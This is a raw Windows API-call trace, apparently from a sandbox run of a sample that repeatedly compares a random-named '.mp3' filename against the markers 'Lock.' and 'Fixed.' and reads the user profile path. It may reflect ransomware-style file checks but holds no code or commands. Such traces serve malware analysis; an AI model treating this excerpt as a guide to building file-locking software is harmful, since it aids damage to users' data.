[0196.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.357] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.357] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CoWnh3Q5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oWnh3Q5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wnh3Q5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nh3Q5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h3Q5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Q5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rTDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TDnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.357] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DnpXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="npXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pXdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XdJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dJ.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.358] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="J.mp3", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0196.358] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.358] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.358] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.359] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x2a) returned 0x24b36c0 [0196.359] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CoWnh3Q5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oWnh3Q5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Wnh3Q5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nh3Q5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h3Q5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3Q5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Q5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.359] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rTDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TDnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DnpXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="npXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pXdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XdJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.360] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dJ.mp3", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3688 [0196.360] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3688 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.360] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0196.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0196.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.361] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0196.361] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0196.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0196.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.361] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.361] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.362] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.362] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.362] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.362] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.363] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.363] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0196.364] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0196.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa218 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0196.364] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.364] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0196.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0196.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0196.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.364] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.365] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0196.365] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0196.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0196.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0196.366] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0196.366] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0196.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0196.367] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.367] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1828 [0196.367] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0196.368] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1828 [0196.368] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 